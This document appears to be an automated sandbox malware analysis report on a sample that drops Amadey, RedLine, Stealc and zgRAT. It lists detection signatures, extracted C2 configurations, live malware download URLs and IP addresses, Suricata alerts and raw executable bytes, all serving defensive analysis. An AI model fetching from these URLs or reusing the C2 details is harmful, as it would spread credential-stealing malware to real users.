Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1516777
MD5: 604496f01be7b778d8a564c57677d644
SHA1: b3a7781e8a94cadb2450c4a3df11b4a2e94ef82c
SHA256: ad1e3f88d7d1c29836570f13b8b540dfdaca9434b9f47170b00cf54519c5edcc
Tags: exe, user-jstrosch

Detection

Amadey, PureLog Stealer, RedLine, Stealc, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected Powershell download and execute
Yara detected PureLog Stealer
Yara detected RedLine Stealer
Yara detected Stealc
Yara detected zgRAT
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Allocates memory in foreign processes
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Found API chain indicative of debugger detection
Found API chain indicative of sandbox detection
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has a writeable .text section
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops certificate files (DER)
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Use Short Name Path in Command Line
Sleep loop found (likely to delay execution)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Name: Amadey
Description: Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name: RedLine Stealer
Description: RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and RedLine. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name: zgRAT
Description: zgRAT is a Remote Access Trojan which sometimes drops other malware such as AgentTesla. zgRAT has an infostealer component which targets browser information and crypto wallets. It usually spreads by USB or phishing emails with .zip/.lnk/.bat/.xlsx attachments and so on.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

AV Detection

Source: file.exe Avira: detected
Source: http://185.215.113.37/X Avira URL Cloud: Label: malware
Source: http://185.215.113.37/O Avira URL Cloud: Label: malware
Source: http://147.45.44.104/malesa/66ed86be077bb_12.exe01 Avira URL Cloud: Label: malware
Source: http://185.215.113.37/H Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpk Avira URL Cloud: Label: malware
Source: http://103.130.147.211/Files/2.exe Avira URL Cloud: Label: malware
Source: http://185.215.113.117/inc/gold.exe Avira URL Cloud: Label: malware
Source: http://185.215.113.37/ata Avira URL Cloud: Label: malware
Source: http://185.215.113.100/steam/random.exe Avira URL Cloud: Label: malware
Source: http://185.215.113.16/dobre/splwow64.exe Avira URL Cloud: Label: phishing
Source: http://194.116.215.195/12dsvc.exe Avira URL Cloud: Label: malware
Source: http://185.215.113.16/inc/2.exe Avira URL Cloud: Label: phishing
Source: http://185.215.113.37/ Avira URL Cloud: Label: malware
Source: http://185.215.113.26/Nework.exe Avira URL Cloud: Label: malware
Source: http://185.215.113.16/Jo89Ku7d/index.php1K Avira URL Cloud: Label: phishing
Source: http://185.215.113.37/tSwf Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpWindows Avira URL Cloud: Label: malware
Source: http://185.215.113.16/inc/penis.exe Avira URL Cloud: Label: phishing
Source: C:\Users\user\1000015002\b74664dd7e.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\random[2].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\2[1].exe Avira: detection malicious, Label: TR/Drop.Agent.fgswh
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\gold[1].exe Avira: detection malicious, Label: HEUR/AGEN.1351932
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\crypted[1].exe Avira: detection malicious, Label: HEUR/AGEN.1357677
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\LummaC222222[1].exe Avira: detection malicious, Label: HEUR/AGEN.1316118
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\penis[1].exe Avira: detection malicious, Label: TR/Spy.RedLine.ouvlp
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\stealc_default2[1].exe Avira: detection malicious, Label: TR/AD.Stealc.pegov
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\acentric[1].exe Avira: detection malicious, Label: TR/Spy.Agent.bvpeh
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Avira: detection malicious, Label: HEUR/AGEN.1351932
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\Blenar[1].exe Avira: detection malicious, Label: HEUR/AGEN.1312961
Source: 00000006.00000002.1318437657.0000000000DA1000.00000040.00000001.01000000.00000003.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 0000001F.00000002.2104172556.0000000003775000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: RedLine {"C2 url": "95.179.250.45:26212", "Bot Id": "LiveTraffic", "Message": "Error! Disable antivirus and try again!", "Authorization Header": "143feb5082f9936e624c1e27545e7d19"}
Source: 15.2.3ec4738210.exe.200000.0.unpack Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\acentric[1].exe ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\crypted[1].exe ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\gold[1].exe ReversingLabs: Detection: 100%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\newbundle2[1].exe ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\2[1].exe ReversingLabs: Detection: 69%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\stealc_default2[1].exe ReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\2[1].exe ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\66ed86be077bb_12[1].exe ReversingLabs: Detection: 70%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\needmoney[1].exe ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\LummaC222222[1].exe ReversingLabs: Detection: 57%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\penis[1].exe ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\splwow64[1].exe ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe ReversingLabs: Detection: 100%
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe ReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Temp\1000285001\2.exe ReversingLabs: Detection: 69%
Source: C:\Users\user\AppData\Local\Temp\1000287001\splwow64.exe ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Local\Temp\1000314001\LummaC222222.exe ReversingLabs: Detection: 57%
Source: C:\Users\user\AppData\Local\Temp\1000318001\66ed86be077bb_12.exe ReversingLabs: Detection: 70%
Source: C:\Users\user\AppData\Local\Temp\1000321001\2.exe ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe ReversingLabs: Detection: 47%
Source: file.exe ReversingLabs: Detection: 47%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\1000015002\b74664dd7e.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\random[2].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\2[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\66ed86be077bb_12[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\needmoney[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\splwow64[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\penis[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\stealc_default2[1].exe Joe Sandbox ML: detected
Source: file.exe Joe Sandbox ML: detected
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 46.19.218.204:443 -> 192.168.2.7:49925 version: TLS 1.2
Source: unknown HTTPS traffic detected: 46.19.218.204:443 -> 192.168.2.7:49931 version: TLS 1.2
Source: Binary string: .pdb8 source: axplong.exe, 0000001B.00000002.3769503003.0000000001494000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: rolsroice.pdb source: 66ed86be077bb_12.exe.27.dr
Source: Binary string: rolsroice.pdbX source: 66ed86be077bb_12.exe.27.dr
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E2C2A2 FindFirstFileExW, 17_2_00E2C2A2
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E668EE FindFirstFileW,FindClose, 17_2_00E668EE
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E6698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 17_2_00E6698F
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E5D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 17_2_00E5D076
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E5D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 17_2_00E5D3A9
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E69642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 17_2_00E69642
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E6979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 17_2_00E6979D
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E5DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 17_2_00E5DBBE
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E69B2B FindFirstFileW,Sleep,FindNextFileW,FindClose, 17_2_00E69B2B
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E65C97 FindFirstFileW,FindNextFileW,FindClose, 17_2_00E65C97
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe File opened: C:\Users\user
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe File opened: C:\Users\user\AppData\Local
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe File opened: C:\Users\user\AppData
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe File opened: C:\Users\user\Desktop\desktop.ini

Networking

Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.7:49709
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:49713 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:49711 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.7:49744 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.16:80 -> 192.168.2.7:49744
Source: Network traffic Suricata IDS: 2044623 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) : 192.168.2.7:49801 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49793 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2044623 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) : 192.168.2.7:49830 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2043231 - Severity 1 - ET MALWARE Redline Stealer TCP CnC Activity : 192.168.2.7:49821 -> 95.179.250.45:26212
Source: Network traffic Suricata IDS: 2046045 - Severity 1 - ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) : 192.168.2.7:49821 -> 95.179.250.45:26212
Source: Network traffic Suricata IDS: 2043234 - Severity 1 - ET MALWARE Redline Stealer TCP CnC - Id1Response : 95.179.250.45:26212 -> 192.168.2.7:49821
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49828 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 95.179.250.45:26212 -> 192.168.2.7:49821
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:49836 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49840 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2044623 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) : 192.168.2.7:49866 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2044623 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) : 192.168.2.7:49879 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2018581 - Severity 1 - ET MALWARE Single char EXE direct download likely trojan (multiple families) : 192.168.2.7:49883 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:49887 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:49892 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2054416 - Severity 1 - ET MALWARE ZharkBot CnC Domain in DNS Lookup (solutionhub .cc) : 192.168.2.7:63385 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2043231 - Severity 1 - ET MALWARE Redline Stealer TCP CnC Activity : 192.168.2.7:49898 -> 89.105.223.196:29862
Source: Network traffic Suricata IDS: 2046045 - Severity 1 - ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) : 192.168.2.7:49898 -> 89.105.223.196:29862
Source: Network traffic Suricata IDS: 2043234 - Severity 1 - ET MALWARE Redline Stealer TCP CnC - Id1Response : 89.105.223.196:29862 -> 192.168.2.7:49898
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:49897 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2054416 - Severity 1 - ET MALWARE ZharkBot CnC Domain in DNS Lookup (solutionhub .cc) : 192.168.2.7:50747 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:49902 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:49907 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 89.105.223.196:29862 -> 192.168.2.7:49898
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49904 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2054416 - Severity 1 - ET MALWARE ZharkBot CnC Domain in DNS Lookup (solutionhub .cc) : 192.168.2.7:55279 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:49882 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:49913 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2054416 - Severity 1 - ET MALWARE ZharkBot CnC Domain in DNS Lookup (solutionhub .cc) : 192.168.2.7:61394 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49914 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2018581 - Severity 1 - ET MALWARE Single char EXE direct download likely trojan (multiple families) : 192.168.2.7:49915 -> 103.130.147.211:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:49920 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2054416 - Severity 1 - ET MALWARE ZharkBot CnC Domain in DNS Lookup (solutionhub .cc) : 192.168.2.7:53927 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2043231 - Severity 1 - ET MALWARE Redline Stealer TCP CnC Activity : 192.168.2.7:49924 -> 185.215.113.67:15206
Source: Network traffic Suricata IDS: 2046045 - Severity 1 - ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) : 192.168.2.7:49924 -> 185.215.113.67:15206
Source: Network traffic Suricata IDS: 2043234 - Severity 1 - ET MALWARE Redline Stealer TCP CnC - Id1Response : 185.215.113.67:15206 -> 192.168.2.7:49924
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:49923 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 185.215.113.67:15206 -> 192.168.2.7:49924
Source: Network traffic Suricata IDS: 2054416 - Severity 1 - ET MALWARE ZharkBot CnC Domain in DNS Lookup (solutionhub .cc) : 192.168.2.7:64065 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49927 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.7:49929 -> 185.244.181.140:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.7:49932 -> 185.244.181.140:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:49833 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:49758 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:49766 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:49730 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044623 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) : 192.168.2.7:49825 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2044623 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) : 192.168.2.7:49852 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2044623 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) : 192.168.2.7:49855 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2044623 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) : 192.168.2.7:49819 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:49719 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044623 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) : 192.168.2.7:49717 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.7:49762 -> 185.215.113.16:80
Source: Malware configuration extractor URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: Malware configuration extractor IPs: 185.215.113.43
Source: Malware configuration extractor URLs: 95.179.250.45:26212
Source: global traffic TCP traffic: 192.168.2.7:49760 -> 95.179.250.45:26212
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 24 Sep 2024 13:34:10 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Tue, 24 Sep 2024 12:56:26 GMTETag: "1c0200-622dd088a9fca"Accept-Ranges: bytesContent-Length: 1835520Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd cf 9d 43 f9 ae f3 10 f9 ae f3 10 f9 ae f3 10 96 d8 58 10 e1 ae f3 10 96 d8 6d 10 f4 ae f3 10 96 d8 59 10 c0 ae f3 10 f0 d6 70 10 fa ae f3 10 79 d7 f2 11 fb ae f3 10 f0 d6 60 10 fe ae f3 10 f9 ae f2 10 97 ae f3 10 96 d8 5c 10 eb ae f3 10 96 d8 6e 10 f8 ae f3 10 52 69 63 68 f9 ae f3 10 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 2f ba f1 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ce 01 00 00 1a 24 00 00 00 00 